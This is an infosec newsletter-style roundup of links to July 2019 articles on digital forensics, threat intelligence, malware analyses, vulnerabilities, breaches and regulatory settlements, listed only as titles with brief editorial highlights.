Summary
— A collection of infosec links to Tools & Tips, Threat Research, and more! The focus trends toward DFIR and threat intelligence, but general information security and hacking-related topics are included as well. This list is not vetted nor intended to be an exhaustive source. Keeping up with the enormous volume of security-related information is a daunting task, but this is my way of filtering the most useful items and improving the signal to noise ratio. The summaries are provided with links for the reader to drill down into particular topics according to their own interests.
This week brings another great round of information ranging from news on high dollar FTC settlements to Business Email Compromise (BEC) and ransomware trends.
Highlights (my Editor top picks):
- The FTC drawing big cash from Facebook and Equifax
- An interesting BEC trend analysis from FinCEN
- The FBI releases decryption keys for GandCrab versions
- An awesome process flow diagram for best practices to add OSINT information into MISP
- isodump.py is a simple Python script utilized to analyze ISO files
- Deriving intelligence from LNK files
- A Deep Dive Into BokBot (IcedID) Malware: – Analysis of the Core Payload
Industry Reports, News, and Miscellany
- Businesses Grow More Vulnerable to Email Attacks, Even with Improved Defenses
- Stolen Payment Data: Infected Ecommerce Website to Darknet Markets
- Top Targets for Business Email Compromise: Financial Crimes Enforcement Network (FinCEN), Financial Trend Analysis
- Meet the World’s Biggest ‘Bulletproof’ Hoster
- Teams are Systems too! A systems perspective on teamwork and leadership.
- Trust is overrated: Don’t be fooled by threats on your internal network
- Active Cyber Defence (ACD) – The Second Year | examining how the NCSC’s ACD programme is improving the security of the UK public sector and the wider UK cyber ecosystem.
- FBI Releases Master Decryption Keys for GandCrab Ransomware
- DFIR Research papers from @DFRWS posted to dfrws.org archive
- Where the Holes Aren’t | A story from WWII and its applicability for today’s risk management
- My browser, the spy: How extensions slurped up browsing histories from 4M users
Tools and Tips
- Hurricanes, Politics, and Sports: How to Defend Against Juicy, Topical Phishing Campaigns
- 5 Tips for a Happy Marriage Between IT Cybersecurity and Operational Technology Teams
- Analyzis of DNS TXT Records
- isodump.py and Malicious ISO Files
- Detection Engineering: Setting Objectives and Scaling for Growth
- Upcoming feature in Sigma: Value Modifiers
- Base64 Encoded Powershell Pivots
- PowerShell & Python: A side-by-side comparison | markdown files for Josh Rickard’s (@MSAdministrator) presentation at BSides Springfield (MO)
- Active Directory Health Checklist
- StreamIO domain/cert monitoring
- The 10 Essentials of Infosec Forensics
- Docker for Pentesters
- New version of Sigma2SplunkAlert with cleaner code and custom search transformations
- Zeke on Zeek: Working With Open-Source Zeek: Adding a Key-value For-Loop
- InfinityHook: Hook system calls, context switches, page faults, DPCs and more.
- Misp-osint-collection: A process with best practices to add OSINT gathered information into MISP
- Running queries on Microsoft Defender Advanced Threat Protection
- Enter Sandbox 26: Logs from 1.6M sandboxed samples – a bit of history, a bit of a requiem
Threat Research – Malware, Phishing, and other Campaigns in the Wild
- Anti-Debugging Techniques from a Complex Visual Basic Packer
- This Phishing Attacker Takes American Express—and Victims’ Credentials
- Abusing Microsoft’s Azure domains to host phishing attacks
- THE AVAST ABUSER: METAMORFO BANKING MALWARE HIDES BY ABUSING AVAST EXECUTABLE
- I Can’t Believe Mirais: Tracking the Infamous IoT Malware
- Newly Discovered Malware Framework Cashing in on Ad Fraud
- With FaceApp in the spotlight, new scams emerge
- Newly identified StrongPity operations
- A Deep Dive Into IcedID Malware: Part II – Analysis of the Core IcedID Payload (Parent Process)
- Turla renews its arsenal with Topinambour
- Threat Spotlight: Sodinokibi ransomware attempts to fill GandCrab void
- SLUB Gets Rid of GitHub, Intensifies Slack Use
- Old Tools for New Money: URL Spreading Shellbot and XMRig Using 17-year old XHide
- Targeted Ransomware: Proliferating Menace Threatens Organizations
- SWEED: Exposing years of Agent Tesla campaigns
- An Analysis of L0rdix RAT, Panel and Builder
- Threat Spotlight: Virlock Polymorphic Ransomware
- EvilGnome: Rare Malware Spying on Linux Desktop Users
- Hard Pass: Declining APT34’s Invite to Join Their Professional Network
- Copy cat of APT Sidewinder ?
- Deriving intelligence from LNK files
- Targeted TrickBot activity drops ‘PowerBrace’ backdoor
Vulnerabilities and Exploits
- Oracle Quarterly Critical Patches Issued July 16, 2019
- Subject: TECHNOLOGY SECURITY ALERT – Exploitation of Ellucian Banner System Vulnerability
- Cylance, I Kill You!
- Unsanitized file validation leads to Malicious payload download via Office binaries.
- Achieving persistence in Slack through local file injection
- Understanding Docker container escapes
Breaches, Government, and Law Enforcement
- Contractor who stole 50TB of NSA data gets nine years in prison
- Facebook’s FTC fine will be $5 billion—or one month’s worth of revenue
- Equifax reportedly close to $700 million data breach settlement
- Kazakhstan government is now intercepting all HTTPS traffic